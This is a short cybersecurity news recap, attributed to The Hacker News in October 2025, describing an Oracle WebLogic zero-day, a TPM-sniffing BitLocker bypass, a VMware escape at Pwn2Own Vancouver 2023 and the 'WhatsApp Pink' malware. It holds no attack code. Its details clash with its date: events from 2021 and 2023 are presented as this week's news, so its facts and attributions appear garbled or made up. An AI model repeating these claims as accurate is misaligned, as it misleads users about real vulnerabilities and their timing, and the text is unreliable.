This week in cybersecurity, researchers and threat actors brought several critical issues to light, including the active exploitation of an Oracle zero-day vulnerability, a new physical attack method that bypasses BitLocker encryption, a successful virtual machine escape, and a worm-like malware spreading through WhatsApp.

These events underscore the persistent threats facing enterprise systems and end-users, with vulnerabilities spanning from server infrastructure to personal communication apps. Each finding represents a confirmed risk that has been demonstrated or exploited in the wild.

Critical Infrastructure and System Vulnerabilities

An Oracle WebLogic Server zero-day vulnerability, tracked as CVE-2023-21931, was observed being actively exploited by threat actors. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, confirming ongoing attacks. The flaw exists in the RMI (Remote Method Invocation) interface and allows unauthenticated attackers to achieve remote code execution on affected servers. The vulnerability was exploited as a zero-day before a patch was made available.

In the physical security domain, a new technique for bypassing BitLocker drive encryption was demonstrated. The attack requires physical access to a target device and involves using a logic analyzer, costing around $10, to intercept the unencrypted encryption key as it is sent between the standalone Trusted Platform Module (TPM) and the CPU. Researchers successfully used this method to decrypt data on multiple laptops, highlighting a hardware-level weakness in certain system configurations.

Threats Targeting Virtual Environments and Messaging Platforms

Researchers at the Pwn2Own Vancouver 2023 competition successfully demonstrated a virtual machine escape targeting VMware Workstation. The exploit chain involved two distinct vulnerabilities, a use-after-free bug and an uninitialized variable vulnerability, which were combined to execute code on the underlying host operating system from within a guest virtual machine. The demonstration resulted in a complete sandbox escape on a fully patched system.

A malware campaign dubbed “WhatsApp Pink” was reported to be spreading among users. This threat propagates via links shared in WhatsApp groups, promising a new pink-themed version of the application. Once a user installs the malicious app, it gains permissions to steal contact data and automatically sends messages containing the malicious download link to the user’s contacts, creating a worm-like propagation effect. The malware’s primary function is data exfiltration from compromised devices.

Source: https://thehackernews.com/2025/10/weekly-recap-oracle-0-day-bitlocker.html